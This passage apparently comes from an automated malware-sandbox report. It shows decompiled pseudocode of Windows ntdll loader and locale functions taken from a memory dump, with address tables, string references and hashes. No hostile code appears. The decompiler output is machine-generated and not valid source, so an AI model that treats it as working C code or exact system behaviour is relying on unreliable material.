				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E036D934A() != 0) {
								_t159 = E0374A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x37b5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E03745510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x37b5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E036D849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E036D8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E036D8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x37b5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x37b5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E036E2280(_t92, 0x37b86cc);
															_t94 = E03799DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E036F61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x37b5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E036D8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x37b5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x37b5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0370F380(_t136, 0x36a1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E036E2280(_t108, 0x37b86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E036F61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E03799D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E036DFFB0(_t118, _t156, 0x37b86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E03709A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                      0x036d8799
                                      0x036d879d
                                      0x036d87a1
                                      0x036d87a3
                                      0x036d87a8
                                      0x036d87c3
                                      0x036d87c3
                                      0x036d87c8
                                      0x036d87d1
                                      0x036d87d4
                                      0x036d87d8
                                      0x036d87e5
                                      0x036d87ec
                                      0x03729bfe
                                      0x03729c00
                                      0x03729c02
                                      0x03729c08
                                      0x03729c0d
                                      0x03729c0f
                                      0x03729c14
                                      0x03729c2d
                                      0x03729c32
                                      0x03729c37
                                      0x03729c3a
                                      0x03729c3c
                                      0x03729c42
                                      0x03729c42
                                      0x03729c3c
                                      0x03729c02
                                      0x036d87da
                                      0x036d87df
                                      0x036d87e3
                                      0x00000000
                                      0x00000000
                                      0x036d87e3
                                      0x036d87f2
                                      0x00000000
                                      0x036d87fb
                                      0x036d87fd
                                      0x036d87fe
                                      0x036d880e
                                      0x036d880f
                                      0x036d8810
                                      0x036d8814
                                      0x036d881a
                                      0x036d881c
                                      0x036d881f
                                      0x036d8821
                                      0x036d8822
                                      0x036d8824
                                      0x036d8826
                                      0x036d882c
                                      0x036d882e
                                      0x03729c48
                                      0x03729c48
                                      0x036d8834
                                      0x036d8834
                                      0x036d8837
                                      0x00000000
                                      0x00000000
                                      0x036d8837
                                      0x036d882e
                                      0x036d883d
                                      0x036d8840
                                      0x036d8843
                                      0x036d8846
                                      0x036d8849
                                      0x036d884c
                                      0x036d884e
                                      0x036d8850
                                      0x036d8852
                                      0x036d8854
                                      0x036d8857
                                      0x036d88b4
                                      0x036d88b6
                                      0x036d88b6
                                      0x036d8859
                                      0x036d8859
                                      0x036d8859
                                      0x036d8861
                                      0x036d8866
                                      0x036d886a
                                      0x036d893d
                                      0x036d8941
                                      0x00000000
                                      0x036d8947
                                      0x036d8947
                                      0x036d894a
                                      0x036d894c
                                      0x00000000
                                      0x036d8952
                                      0x036d8955
                                      0x036d895a
                                      0x036d895d
                                      0x036d895d
                                      0x036d895f
                                      0x036d8961
                                      0x036d8961
                                      0x036d8968
                                      0x00000000
                                      0x00000000
                                      0x036d896a
                                      0x036d896b
                                      0x036d896e
                                      0x00000000
                                      0x036d8970
                                      0x036d8970
                                      0x036d8970
                                      0x036d8970
                                      0x036d8972
                                      0x036d8972
                                      0x036d8974
                                      0x00000000
                                      0x036d897a
                                      0x036d897a
                                      0x036d897d
                                      0x00000000
                                      0x036d8983
                                      0x03729c65
                                      0x03729c6d
                                      0x03729c72
                                      0x03729c75
                                      0x03729c75
                                      0x03729c82
                                      0x03729c86
                                      0x03729c87
                                      0x03729c88
                                      0x03729c89
                                      0x03729c8c
                                      0x03729c90
                                      0x03729c95
                                      0x03729c97
                                      0x03729ca0
                                      0x03729ca3
                                      0x03729ca9
                                      0x03729ca9
                                      0x00000000
                                      0x03729ca9
                                      0x03729ca3
                                      0x00000000
                                      0x03729c97
                                      0x036d897d
                                      0x00000000
                                      0x036d8974
                                      0x036d8988
                                      0x036d8992
                                      0x036d8996
                                      0x00000000
                                      0x036d8996
                                      0x036d894c
                                      0x00000000
                                      0x036d8870
                                      0x036d887b
                                      0x036d887d
                                      0x036d887f
                                      0x036d8881
                                      0x036d8884
                                      0x036d8884
                                      0x036d8886
                                      0x036d8889
                                      0x036d888c
                                      0x036d888e
                                      0x036d8891
                                      0x036d8891
                                      0x036d8898
                                      0x00000000
                                      0x00000000
                                      0x036d889a
                                      0x036d889b
                                      0x036d889e
                                      0x00000000
                                      0x00000000
                                      0x036d88a0
                                      0x036d88a8
                                      0x036d88b0
                                      0x036d88b2
                                      0x036d88d3
                                      0x036d88d5
                                      0x00000000
                                      0x036d88d7
                                      0x036d88db
                                      0x036d88dc
                                      0x036d88e0
                                      0x036d88e8
                                      0x036d88ee
                                      0x036d88f0
                                      0x036d88f3
                                      0x036d88fc
                                      0x036d8901
                                      0x036d8906
                                      0x036d890c
                                      0x036d890c
                                      0x036d890f
                                      0x036d8916
                                      0x036d8917
                                      0x036d8918
                                      0x036d8919
                                      0x036d891a
                                      0x036d891f
                                      0x036d8921
                                      0x03729c52
                                      0x03729c55
                                      0x03729c5b
                                      0x03729cac
                                      0x03729cc0
                                      0x03729cc0
                                      0x03729c55
                                      0x036d8927
                                      0x036d8927
                                      0x036d892f
                                      0x036d8933
                                      0x00000000
                                      0x036d88f5
                                      0x036d88f5
                                      0x00000000
                                      0x036d88f7
                                      0x036d88f7
                                      0x036d88fa
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x036d88fa
                                      0x036d88f5
                                      0x036d88f3
                                      0x00000000
                                      0x036d88d5
                                      0x00000000
                                      0x036d88b2
                                      0x036d88c9
                                      0x00000000
                                      0x036d88c9
                                      0x036d887f
                                      0x036d886a
                                      0x036d8857
                                      0x036d8852
                                      0x036d88bf
                                      0x036d88bf
                                      0x036d87aa
                                      0x036d87ad
                                      0x036d87ae
                                      0x036d87b4
                                      0x036d87b5
                                      0x036d87b6
                                      0x036d87b8
                                      0x036d87bd
                                      0x036d87c1
                                      0x036d87f4
                                      0x036d87fa
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x036d87c1
                                      0x00000000

                                      Strings
                                      • minkernel\ntdll\ldrsnap.c, xrefs: 03729C28
                                      • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 03729C18
                                      • LdrpDoPostSnapWork, xrefs: 03729C1E
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                      • API String ID: 0-1948996284
                                      • Opcode ID: 3da5f5e5d46ff9ed0469c037ed5a16b769ccd9b2122abe945f9dceeddc10d425
                                      • Instruction ID: c36f387265ffe71bc22cbc05bc9e8af04f6728d1f0c32a9b195315969f410400
                                      • Opcode Fuzzy Hash: 3da5f5e5d46ff9ed0469c037ed5a16b769ccd9b2122abe945f9dceeddc10d425
                                      • Instruction Fuzzy Hash: AE91F071E0021AEFDB18DF59C588ABEB7B9FF45310B0841A9E945AB241E730ED41CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036D7E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 98%
                                      			E036D7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E036DCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E036CC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x37b5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E03745510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x37b5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E036E7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E036E7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E03747016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E036E7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E036E7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E03747016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E036FA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E036CB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                      0x036d7e4c
                                      0x036d7e50
                                      0x036d7e55
                                      0x036d7e58
                                      0x036d7e5d
                                      0x036d7e71
                                      0x036d7f33
                                      0x036d7e77
                                      0x036d7e77
                                      0x036d7e79
                                      0x036d7e79
                                      0x036d7e7e
                                      0x036d7f45
                                      0x03729848
                                      0x00000000
                                      0x03729848
                                      0x036d7f4e
                                      0x036d7f53
                                      0x036d7f5a
                                      0x00000000
                                      0x00000000
                                      0x0372985a
                                      0x03729862
                                      0x03729866
                                      0x00000000
                                      0x0372986c
                                      0x00000000
                                      0x0372986c
                                      0x036d7e84
                                      0x036d7e84
                                      0x036d7e8d
                                      0x03729871
                                      0x036d7eb8
                                      0x036d7ec0
                                      0x036d7ec0
                                      0x036d7e9a
                                      0x0372987e
                                      0x00000000
                                      0x00000000
                                      0x03729884
                                      0x0372988b
                                      0x037298a7
                                      0x037298ac
                                      0x037298b1
                                      0x037298b6
                                      0x037298b8
                                      0x037298b8
                                      0x037298b9
                                      0x00000000
                                      0x037298b9
                                      0x036d7ea0
                                      0x036d7ea7
                                      0x00000000
                                      0x00000000
                                      0x036d7eac
                                      0x036d7eb1
                                      0x036d7ec6
                                      0x036d7ed0
                                      0x037298cc
                                      0x036d7ed6
                                      0x036d7ed6
                                      0x036d7ed6
                                      0x036d7ede
                                      0x036d7ee3
                                      0x037298e3
                                      0x037298f0
                                      0x03729902
                                      0x037298f2
                                      0x037298fb
                                      0x037298fb
                                      0x03729907
                                      0x0372991d
                                      0x0372991d
                                      0x03729907
                                      0x037298e3
                                      0x036d7ef0
                                      0x036d7f14
                                      0x036d7f14
                                      0x036d7f1e
                                      0x03729946
                                      0x036d7f24
                                      0x036d7f24
                                      0x036d7f24
                                      0x036d7f2c
                                      0x0372996a
                                      0x03729975
                                      0x03729975
                                      0x0372997e
                                      0x03729993
                                      0x03729993
                                      0x0372997e
                                      0x00000000
                                      0x036d7ef2
                                      0x036d7efc
                                      0x036d7f0a
                                      0x036d7f0e
                                      0x03729933
                                      0x00000000
                                      0x03729933
                                      0x00000000
                                      0x036d7f0e
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x036d7eb1

                                      Strings
                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 03729891
                                      • minkernel\ntdll\ldrmap.c, xrefs: 037298A2
                                      • LdrpCompleteMapModule, xrefs: 03729898
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                      • API String ID: 0-1676968949
                                      • Opcode ID: f1e2d8b49e78e352470b8e41a5399b55d6d7abdbee4708d84e4b3cea64950967
                                      • Instruction ID: 037c73f7f9e1d24ad2f3ea0cecf606711484c51ae4e5369333e7dbc42704374f
                                      • Opcode Fuzzy Hash: f1e2d8b49e78e352470b8e41a5399b55d6d7abdbee4708d84e4b3cea64950967
                                      • Instruction Fuzzy Hash: F2510235A007849FDB21CF68C944B6ABBE4EF42320F0C06A9E9519B7E1D734ED01CB92
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036CE620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 93%
                                      			E036CE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E036CF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E037095D0();
						}
						if(_t78 != 0) {
							L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0370FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0370BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E03709600();
					if(_t97 < 0) {
						goto L6;
					}
					E0370BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L036CF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0370BB40(_t83, _t102 + 0x24, _t78);
								if(L036D43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0370BB40(_t84, _t102 + 0x24, _t94);
									if(L036D43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                      0x036ce620
                                      0x036ce628
                                      0x036ce62f
                                      0x036ce631
                                      0x036ce635
                                      0x036ce637
                                      0x036ce63e
                                      0x03725503
                                      0x03725503
                                      0x036ce64c
                                      0x036ce64c
                                      0x036ce651
                                      0x00000000
                                      0x00000000
                                      0x036ce661
                                      0x036ce665
                                      0x0372542a
                                      0x036ce715
                                      0x036ce71a
                                      0x036ce71c
                                      0x036ce720
                                      0x036ce720
                                      0x036ce727
                                      0x036ce736
                                      0x036ce736
                                      0x036ce743
                                      0x036ce743
                                      0x036ce673
                                      0x036ce678
                                      0x036ce67d
                                      0x036ce682
                                      0x036ce685
                                      0x036ce692
                                      0x036ce69b
                                      0x036ce6a3
                                      0x036ce6ad
                                      0x036ce6b1
                                      0x036ce6b2
                                      0x036ce6bb
                                      0x036ce6bf
                                      0x036ce6c0
                                      0x036ce6c8
                                      0x036ce6cc
                                      0x036ce6d5
                                      0x036ce6d9
                                      0x00000000
                                      0x00000000
                                      0x036ce6e5
                                      0x036ce6ea
                                      0x036ce6f9
                                      0x036ce70b
                                      0x036ce70f
                                      0x03725439
                                      0x0372545e
                                      0x0372545e
                                      0x00000000
                                      0x0372545e
                                      0x0372543b
                                      0x0372543e
                                      0x03725440
                                      0x03725445
                                      0x03725472
                                      0x03725475
                                      0x0372548d
                                      0x03725493
                                      0x037254a9
                                      0x00000000
                                      0x00000000
                                      0x037254ab
                                      0x037254b4
                                      0x037254bc
                                      0x037254c8
                                      0x037254de
                                      0x037254fb
                                      0x037254e0
                                      0x037254e6
                                      0x037254eb
                                      0x037254eb
                                      0x037254de
                                      0x00000000
                                      0x037254bc
                                      0x03725477
                                      0x0372547a
                                      0x03725480
                                      0x03725483
                                      0x03725486
                                      0x0372548b
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0372548b
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x03725447
                                      0x03725447
                                      0x03725447
                                      0x03725447
                                      0x0372544e
                                      0x00000000
                                      0x00000000
                                      0x03725450
                                      0x03725452
                                      0x03725455
                                      0x0372545a
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0372545c
                                      0x0372546a
                                      0x0372546d
                                      0x0372546f
                                      0x00000000
                                      0x0372546f
                                      0x036ce70f

                                      Strings
                                      • InstallLanguageFallback, xrefs: 036CE6DB
                                      • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 036CE68C
                                      • @, xrefs: 036CE6C0
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                      • API String ID: 0-1757540487
                                      • Opcode ID: 400064d7f07b3d3c7f09e552953d3f137b05af19921e77ea73c585437c849095
                                      • Instruction ID: 0bb405233ed5868a8783e5d971830a8f62429149c539a485bf9609a8fdce6e2f
                                      • Opcode Fuzzy Hash: 400064d7f07b3d3c7f09e552953d3f137b05af19921e77ea73c585437c849095
                                      • Instruction Fuzzy Hash: 2551DF765183559BC710DF65C444A7BF7E8EF89625F09092EF989DB240FB30DA04CBA2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 037451BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 77%
                                      			E037451BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x37a05f0);
				E0371D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E036DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
